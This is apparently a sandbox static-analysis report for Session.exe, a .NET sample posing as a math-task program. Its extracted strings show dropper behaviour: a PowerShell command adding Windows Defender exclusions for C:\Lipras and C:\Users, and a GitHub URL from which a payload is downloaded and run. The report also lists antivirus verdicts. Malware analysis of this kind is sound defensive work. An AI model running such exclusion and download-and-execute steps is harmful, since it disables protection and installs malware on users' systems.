Static | ZeroBOX

PE Compile Time

2059-02-04 11:31:45

PDB Path

C:\Users\danie\source\repos\Session\Session\obj\Debug\Session.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x000048a0 0x00004a00 5.29814189558
.rsrc 0x00008000 0x0000059c 0x00000600 4.02497607367
.reloc 0x0000a000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x00008090 0x0000030c LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x000083ac 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<Main>d__20
<>c__DisplayClass20_0
<>c__DisplayClass12_0
<>c__DisplayClass13_0
<>c__DisplayClass14_0
<>c__DisplayClass15_0
<>c__DisplayClass16_0
<>c__DisplayClass17_0
<>c__DisplayClass18_0
<>c__DisplayClass19_0
<>9__0
<CalculateSumOfPowersOf2Async>b__0
<CalculateSumOfFibonacciAsync>b__0
<CalculateSumOfCubesAsync>b__0
<CalculateSumOfDivisiblesAsync>b__0
<CalculateSumOfPrimesAsync>b__0
<CalculateSumOfSquaresAsync>b__0
<CalculateSumOfReciprocalsAsync>b__0
<CalculateSumOfFactorialsAsync>b__0
<Main>b__0
<CalculateSumOfPrimesAsync>g__IsPrime|13_1
<CalculateSumOfFactorialsAsync>g__Factorial|17_1
<>8__1
<>u__1
IEnumerable`1
<CalculateSumOfFibonacciAsync>d__12
<attempts>5__2
Func`2
<CalculateSumOfPrimesAsync>d__13
<inputThread>5__3
<CalculateSumOfDivisiblesAsync>d__14
<url>5__4
<CalculateSumOfSquaresAsync>d__15
<filePath>5__5
<CalculateSumOfCubesAsync>d__16
<>s__6
<CalculateSumOfFactorialsAsync>d__17
<filePath>5__7
<CalculateSumOfPowersOf2Async>d__18
<CalculateSumOfReciprocalsAsync>d__19
<Module>
<Main>
SW_HIDE
System.IO
SW_SHOW
mscorlib
set_Verb
System.Collections.Generic
CalculateSumOfPowersOf2Async
CalculateSumOfFibonacciAsync
CalculateSumOfCubesAsync
CalculateSumOfDivisiblesAsync
CalculateSumOfPrimesAsync
CalculateSumOfSquaresAsync
CalculateSumOfReciprocalsAsync
CalculateSumOfFactorialsAsync
Thread
taskSelected
AwaitUnsafeOnCompleted
get_IsCompleted
choice
get_ExitCode
get_Message
Enumerable
IDisposable
Double
get_MainWindowHandle
DownloadFile
RunFile
IsInRole
WindowsBuiltInRole
Console
LeastCommonMultiple
set_FileName
ReadLine
WriteLine
IAsyncStateMachine
SetStateMachine
stateMachine
System.Core
Dispose
Create
<>1__state
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AsyncStateMachineAttribute
DebuggerStepThroughAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
Session.exe
System.Threading
System.Runtime.Versioning
String
filePath
get_Task
System.Security.Principal
WindowsPrincipal
user32.dll
Program
System
RestartAsAdmin
IsAdmin
Session
get_Location
Action
System.Reflection
SetException
ProcessStartInfo
DirectoryInfo
System.Linq
FibonacciNumber
AsyncTaskMethodBuilder
<>t__builder
CreateFolder
TaskAwaiter
GetAwaiter
set_RedirectStandardError
GreatestCommonDivisor
IntPtr
System.Diagnostics
NativeMethods
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
System.Threading.Tasks
AddDefenderExclusions
SumNaturalNumbers
GetCurrentProcess
SumOfDigits
set_Arguments
Exists
Concat
Format
Object
Select
System.Net
WaitForExit
GetResult
SetResult
WebClient
Environment
GetCurrent
ThreadStart
set_RedirectStandardOutput
MoveNext
HideWindow
set_CreateNoWindow
ShowWindow
nCmdShow
ToArray
GetEntryAssembly
CreateDirectory
set_WorkingDirectory
get_CurrentDirectory
op_Inequality
WindowsIdentity
WrapNonExceptionThrows
Session
Copyright
2024
$49316913-ec82-4f30-b6a0-fe6b10ad28b0
1.0.0.0
.NETFramework,Version=v4.7.2
FrameworkDisplayName
.NET Framework 4.7.20
+Program+<CalculateSumOfFibonacciAsync>d__12
(Program+<CalculateSumOfPrimesAsync>d__13
,Program+<CalculateSumOfDivisiblesAsync>d__14
)Program+<CalculateSumOfSquaresAsync>d__15
'Program+<CalculateSumOfCubesAsync>d__16
,Program+<CalculateSumOfFactorialsAsync>d__17
+Program+<CalculateSumOfPowersOf2Async>d__18
-Program+<CalculateSumOfReciprocalsAsync>d__19
Program+<Main>d__20
C:\Users\danie\source\repos\Session\Session\obj\Debug\Session.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Task 1: Calculate the sum of the first n natural numbers.
The sum of the first {0} natural numbers is {1}
Task 2: Calculate the nth Fibonacci number.
The {0}th Fibonacci number is {1}
Task 3: Calculate the greatest common divisor (GCD) of two numbers.
The GCD of the two numbers is {0}
Task 4: Calculate the least common multiple (LCM) of two numbers.
The LCM of the two numbers is {0}
Task 5: Calculate the sum of the digits of a number.
The sum of the digits of the number is {0}
Failed to elevate the process. Error:
C:\Lipras
Folder 'Lipras' created on C: drive.
Folder 'Lipras' already exists on C: drive.
powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'"
powershell.exe
Folders added to Windows Defender exclusions.
Failed to add folders to Windows Defender exclusions.
File downloaded successfully:
Failed to download file. Error:
File launched successfully:
Failed to launch file. Error:
Sum of Fibonacci numbers up to {0} is {1}
Sum of prime numbers up to {0} is {1}
Sum of numbers divisible by 3 or 5 up to {0} is {1}
Sum of squares up to {0} is {1}
Sum of cubes up to {0} is {1}
Sum of factorials up to {0} is {1}
Sum of powers of 2 up to {0} is {1}
Sum of reciprocals up to {0} is {1}
Choose a task (1-5) within 2 seconds:
1. Calculate the sum of the first n natural numbers.
2. Calculate the nth Fibonacci number.
3. Calculate the greatest common divisor (GCD) of two numbers.
4. Calculate the least common multiple (LCM) of two numbers.
5. Calculate the sum of the digits of a number.
No task selected within 2 seconds. Creating folder 'Jiras' on C: drive.
No task selected within 2 seconds. Adding folders to Windows Defender exclusions.
Choose a task (1-5) within 4 seconds:
No task selected within 4 seconds. Downloading file.
https://github.com/vonuch1/start/raw/refs/heads/main/khtoawdltrha.exe
C:\Lipras\pdf.exe
Invalid choice.
No task selected within 2 seconds. Running downloaded file.
Program will now exit.
Failed to run the file. Program will now exit.
Main program finished.
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Session
FileVersion
1.0.0.0
InternalName
Session.exe
LegalCopyright
Copyright
2024
LegalTrademarks
OriginalFilename
Session.exe
ProductName
Session
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Clean
Elastic malicious (moderate confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Cylance Clean
Zillya Clean
CrowdStrike Clean
Alibaba Clean
K7GW Clean
K7AntiVirus Clean
huorong Clean
Baidu Clean
VirIT Clean
Paloalto Clean
Symantec Clean
tehtris Clean
ESET-NOD32 Clean
APEX Malicious
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfeeD ti!AA133AF788A5
Trapmine Clean
CTX Clean
Emsisoft Clean
Ikarus Clean
FireEye Clean
Jiangmin Clean
Webroot Clean
Varist Clean
Avira Clean
Fortinet Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Adware.Win32.Amonetize.dd!n
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Malwarebytes Clean
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Clean
Yandex Clean
SentinelOne Static AI - Suspicious PE
MaxSecure Trojan.Malware.300983.susgen
GData Clean
AVG Clean
DeepInstinct Clean
alibabacloud Trojan
No IRMA results available.